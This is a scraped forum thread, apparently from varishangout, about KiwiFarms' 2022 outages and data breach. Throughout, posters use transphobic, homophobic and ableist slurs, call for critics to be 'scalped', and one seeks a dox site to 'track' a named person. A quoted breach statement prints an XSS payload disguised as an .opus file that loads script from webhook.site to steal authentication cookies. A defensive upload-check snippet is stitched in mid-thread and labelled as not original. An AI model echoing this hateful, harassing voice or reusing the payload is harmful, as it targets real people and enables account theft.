
KiwiFarms gets thrown under the bus by Rep. Marjorie Taylor Greene inadvertently providing cover for Keffals

Thread Description
Army of drooling imbeciles attack Free Speech Forum because people there said mean things about Keffals

Torment

varishangout.com
Regular
 

The Decimator

Site hacked, tor down and now the troon mafia is attacking any other means null has to fight back yet the fucking lemming retard masses cheer in favor of all of this, supporting the fag who wants to convince your 6 YEAR OLD SON to cut off his dick, grow tits, put on panties and dance in front of middle aged guys in speedos. I already had a negative opinion of 99% of humanity but this cements that'll never change.
Those evil fucking parasites just don’t know when to stop.
 

Nehir

Site hacked, tor down and now the troon mafia is attacking any other means null has to fight back yet the fucking lemming retard masses cheer in favor of all of this, supporting the fag who wants to convince your 6 YEAR OLD SON to cut off his dick, grow tits, put on panties and dance in front of middle aged guys in speedos. I already had a negative opinion of 99% of humanity but this cements that'll never change.
Hacked? Did they change what it says or delete threads? Do you have a screencap?
 

YakuInTheFlesh

Regular
literally just go to kiwifarms.net
josh explained everything there
I highly recommend this. The little privacy advice he gives is pretty solid and should be taken seriously if you value privacy. Added to that I would also recommend to check out https://www.privacytools.io/

Some excerpts that I think are the most interesting:
The forum was hacked. You should assume the following.

  • Assume your password for the Kiwi Farms has been stolen.
  • Assume your email has been leaked.
  • Assume any IP you've used on your Kiwi Farms account in the last month has been leaked.
Use an email address from a reputable provider. Never use the same password. Use a passphrase with a password manager
Even now, the many groups which have organized to terrorize businesses and attack the servers are looking for new opportunities to complicate our situation.
Every time I see the reaction of these people, it is this hideous arrogance. I am so filled with utter revulsion at the thought of letting smug, dangerous perverts get away with hiding who they are from the public.
XenForo provides a way to export user lists with information that is precisely: email, username, last activity, register date, user state (banned/unverified), post count
The script was uploaded to XenForo directly (as XenForo does not validate media),
XenForo removed us from their license a year ago and their software is no longer sufficient for our needs. We needed something custom, but my confidence in my work has been shot.

Anyone who is in favor of this happening has lost their mind and doesn't understand what this means. In the worst case scenario this was a paid actor and the information could've been used for a mass doxxing of KiwiFarms users. But of course the people who stand proud against the "evil KiwiFarmers that dox everybody" would never do that...
As mentioned in the beginning of the post. Up your privacy! At the very least use more than one E-Mail and Password for everything.
 

Insane Nerd Ramblings

If Null hadn't proven to be an utterly useless fagaloon on Poast, I would have been willing to forgive the BS. But he simply claimed it was a handful of bad actors (Jack Awful and the like) before going "kys pedo", proving that it wasn't just "a few bad actors". His group of shit-brained slacktivists like "I hope they post CSEM" Procrastinhater can burn for all I care.
 

Nehir

If Null hadn't proven to be an utterly useless fagaloon on Poast, I would have been willing to forgive the BS. But he simply claimed it was a handful of bad actors (Jack Awful and the like) before going "kys pedo", proving that it wasn't just "a few bad actors". His group of shit-brained slacktivists like "I hope they post CSEM" Procrastinhater can burn for all I care.
Did he stop using poast?
 

Nehir

literally just go to kiwifarms.net
josh explained everything there
I clicked too late to see the letter. It's only an animated video when I found this post. I didn't know it ever changed from the teacup thing. Okay it looks like the clearnet domain is up rn.
 

YakuInTheFlesh

Regular
I clicked too late to see the letter. It's only an animated video when I found this post. I didn't know it ever changed from the teacup thing. Okay it looks like the clearnet domain is up rn.
Here's the text that was posted if you want it:
Site Breach
User Impact Statement
The forum was hacked. You should assume the following.

  • Assume your password for the Kiwi Farms has been stolen.
  • Assume your email has been leaked.
  • Assume any IP you've used on your Kiwi Farms account in the last month has been leaked.
Thankfully, most users pay attention to my privacy checkups and there isn't much to leak.
You should take a moment to read privacyguides.org, even if you hate this site. Use an email address from a reputable provider. Never use the same password. Use a passphrase with a password manager suggested on PrivacyGuides. Use email aliases instead of burner emails so you keep access to your accounts without risking your privacy.

I do not know for sure if any user information was leaked. In my access logs, they attempted to download all user records at once. This caused an error and no output was returned. I shut everything off soon after. If they scraped information through some other mechanism, I cannot say with any confidence either way.

Prognosis
The site will be restored from a backup point taken at September 17th at Noon GMT.

This will not happen immediately. I need to reformat and reinstall everything. I need to completely evaluate my security from the top down.

Cloudflare not only provided DDoS protection, they also accounted for many popular exploits like this. As I've worked for weeks to combat the endless flow of attacks from every conceivable angle I have spread myself very thin and hurriedly replaced old systems with new ones that are not properly vetted.

Even now, the many groups which have organized to terrorize businesses and attack the servers are looking for new opportunities to complicate our situation.

I am very, very tired of writing statements like this, but I find it difficult to stifle my righteous indignation. Every time I see the reaction of these people, it is this hideous arrogance. I am so filled with utter revulsion at the thought of letting smug, dangerous perverts get away with hiding who they are from the public.

More than anything, I really miss spending time with you guys and laughing at stupid shit. It is very draining to deal with such miserable people all the time.

Technical Explanation
Yesterday, vsys - one of our hosts out of Ukraine - was compromised. I initially believed that this allowed a hacker to take over that webserver and snoop data as a man-in-the-middle. I no longer believe that is the case.

A bad actor was able to upload a webpage disguised as an audio file to XenForo. Elsewhere, he was able to load this webpage (probably as an inline frame), causing random users to make automated requests and send their authentication cookies off-site, so that the attacker could use it to gain access to their account. My admin account was compromised through this mechanism.

Once they had access to the ACP, they attempted to download user data, and XenForo provides a way to export user lists with information that is precisely: email, username, last activity, register date, user state (banned/unverified), post count, and if they are staff.

However, their request did not appear to go through because they requested too many records at once. The following record reports a 500 error and no content.

2a03:e600:100::31 - - [18/Sep/2022:08:16:13 +0000] "GET /admin.php?users/list-export&export=1 HTTP/2.0" 500 0 "https://kiwifarms.st/admin.php?users/list" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
It's impossible to say if they acquired user data through other means, but I did not see any other attempt to complete this transaction or otherwise scrape user data.
The file uploaded was an .opus file that contained a web document that looked like this.

<!DOCTYPE html>
<script src=//webhook.site/payload-url></script>
I do not know what was in the payload. The webhook site allows for you to redirect to other scripts and to delete request history, which was done. There's no information tied to that page.
The script caused the user to load /test-chat, my chat shim, /help/, XenForo's help documentation, /avatar/avatar, to change their avatar to the logo of another site (likely as a frame job), and admin.php?tools/phpinfo, if they were an admin.

The script was uploaded to XenForo directly (as XenForo does not validate media), but injected by my custom Rust-based chat program that interacts with XenForo and borrows sessions.

x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/xxxx/xxxx.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
You can find relevant scripts below.
XenForo removed us from their license a year ago and their software is no longer sufficient for our needs. We needed something custom, but my confidence in my work has been shot.

The sophistication in this attack is very high, and shows an intimate familiarity with both Rust and XenForo. It is unfortunate that they have applied themselves to this end, likely for pay.

There are so many more people trying to destroy than create.

Take it easy,
Josh

P.S. I am still expecting to have to deal with that family emergency. If that happens, I will be gone for a while. Updates will be on t.me/s/kiwifarms.

Update Sep-19: XSS Injection Found
There were two possible ways to inject an inframe into the chat html, one by using [code] tags, and another by malforming an opening tag, like [b<tag>].

Thank you to the three anonymous people who submitted this information.
[/QUOTE]
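
The statement quoted above says the uploaded .opus file was really a web document and that uploads were not validated. As an added example (not part of the original post, and not XenForo's or the site's code), this is one way to check at upload time that a claimed .opus file starts with a real Ogg Opus page, and to serve stored uploads so a browser will not render them as a page. The function names are hypothetical and the sample Ogg page is constructed.

```python
import struct

OGG_HEADER_LEN = 27  # fixed part of an Ogg page header (RFC 3533)

# The web document quoted in the statement, as the bytes of the ".opus" upload.
HTML_AS_OPUS = b"<!DOCTYPE html>\n<script src=//webhook.site/payload-url></script>\n"

def is_ogg_opus(data: bytes) -> bool:
    """True only if data starts with a beginning-of-stream Ogg page carrying OpusHead."""
    if len(data) < OGG_HEADER_LEN or data[:4] != b"OggS":
        return False
    version, header_type = data[4], data[5]
    if version != 0 or not header_type & 0x02:  # 0x02 = beginning-of-stream flag
        return False
    nsegs = data[26]                            # length of the segment table
    payload = data[OGG_HEADER_LEN + nsegs:]
    return payload[:8] == b"OpusHead"           # RFC 7845 identification header

def check_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Accept a claimed .opus upload only when the bytes agree with the extension."""
    if not filename.lower().endswith(".opus"):
        return False, "unsupported extension"
    if not is_ogg_opus(data):
        return False, "content is not Ogg Opus"
    return True, "ok"

def serving_headers() -> dict[str, str]:
    """Response headers that stop a stored upload from being treated as a document."""
    return {
        "Content-Type": "audio/ogg",
        "X-Content-Type-Options": "nosniff",  # no MIME sniffing to text/html
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }

def sample_opus_page() -> bytes:
    """Constructed minimal first Ogg page (CRC left at zero; it is not checked here)."""
    head = b"OpusHead" + struct.pack("<BBHIhB", 1, 2, 312, 48000, 0, 0)
    header = b"OggS" + struct.pack("<BBqIII", 0, 0x02, 0, 1, 0, 0)
    return header + bytes([1, len(head)]) + head

if __name__ == "__main__":
    print(check_upload("clip.opus", sample_opus_page()))
    print(check_upload("clip.opus", HTML_AS_OPUS))
```

The header check only looks at the first page; serving uploads from a separate cookieless origin is a complementary control that this sketch does not cover.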
 

Insane Nerd Ramblings

It is very draining to deal with such miserable people all the time.
If that isn't the pot calling the kettle black, I'll eat my fucking hat. This is why Null lost my respect, letting his goddamn moronic tards get away with their BS, claiming "it was only a few bad actors" and then proceeding to prove it wasn't just "a few bad actors". The fact this shirtbird cares more about malding and seething over drawings than actual fucking kiddie diddlers told me everything I needed to know about them.
 

ジエントP

It's incredibly depressing to see what's happening to KF rn.
Their .ru domain even got pulled, which is absolutely insane.
DDoS-Guard dropped them last I checked. The fucking guys who'll host hamas, have dropped KFs.

This isn't the end of it (I hope), and I'm sure people will move on as they do with the 24 Hour news cycle, and hopefully KiwiFarms will regain some of their security and infrastructure. Josh has made it through before and I'm sure he'll come through again.

You can find Josh's statement here (TOR link).

Let's hope this isn't the last we hear from KF.
Even if you don't like what KF does, it's users, or what they talk about, if you don't see what a horrifying signal this is for the future of the internet you're a fucking retard.
Anyone celebrating what happened to them needs to be scalped.
Considering the fact that they like to stir up crap everywhere even to those who'll take them in I wouldn't be surprised if they tried to make enemies with DDOS-guard as well. Not to take anything bad from the good they do do but they simply are not most amicable people and like to stir up drama to their allies to say it lightly.
 

Scornful Gaze

Regular
Patron of the Forums
Site is back up on the clearnet at the .net domain again. As usual, backup what you need while you can.

I guess this also counts as a cultural exchange thread.
 

Nehir

If that isn't the pot calling the kettle black, I'll eat my fucking hat. This is why Null lost my respect, letting his goddamn moronic tards get away with their BS, claiming "it was only a few bad actors" and then proceeding to prove it wasn't just "a few bad actors". The fact this shirtbird cares more about malding and seething over drawings than actual fucking kiddie diddlers told me everything I needed to know about them.
There used to be a really good null thread on a kiwi farms splinter site called lolcow dot org and he was really into neko shota when he was younger apparently.
 

grapedApe

Regular
Anyone know the other dox site that lucas apparently doesn't want anyone to know about, would be a shame if we tracked his dumbass.
 

Hexasheep93

Regular
Is varshhangout pro kiwi farms?
On principle. Varis is pro-freedom of speech and expression whether is controversial art like loli or unpopular opinions like those found on the kiwifarms so on that aspect most of us are not happy with the censorship of the farms.

On a personal level, it varies, some like them for standing against the mainstream ideologies.
While others, me included admittedly, dislike them for their, frankly, myopic view on anime.
 

Mr. Suave

On principle. Varis is pro-freedom of speech and expression whether is controversial art like loli or unpopular opinions like those found on the kiwifarms so on that aspect most of us are not happy with the censorship of the farms.

On a personal level, it varies, some like them for standing against the mainstream ideologies.
While others, me included admittedly, dislike them for their, frankly, myopic view on anime.
Well I guess I should make my center left political views known then. Is there a way to post a bio on my profile. I'm still relatively new.

For the record, I think kiwi farms was a cess pool of retarded, freakish alt-right incels who's cancerous activities were nothing short of terrorism. And I highly praise Keffals for her successful campaign in shutting down there freakish site. I came here to engage with weebs, lolicons and social outcasts. Not far right cyber bullies. Hopefully those aren't the kind of people that lark here.
 

Narmy

Regular
Well I guess I should make my center left political views known then. Is there a way to post a bio on my profile. I'm still relatively new.

For the record, I think kiwi farms was a cess pool of retarded, freakish alt-right incels who's cancerous activities were nothing short of terrorism. And I highly praise Keffals for her successful campaign in shutting down there freakish site. I came here to engage with weebs, lolicons and social outcasts. Not far right cyber bullies. Hopefully those aren't the kind of people that lark here.
If you like lolis then you should be in favor of free speech, even for people you disagree with. Otherwise you can't complain when it is you on the receiving end of censorship.
 

Cursed

Regular
If you like lolis then you should be in favor of free speech, even for people you disagree with. Otherwise you can't complain when it is you on the receiving end of censorship.
I follow a logic: if they can censor someone, one day they can do that to me even if what I say/did is still legal.
Fight for the freedom of everyone, because censorship is a dangerous idea and in reality it creates a worse situation; for me, the censoring of kiwifarms creates a worse situation for keffals and radicalizes people who are already very insane.
Only dialogue/education works; that is why democracy is actually the best system.
 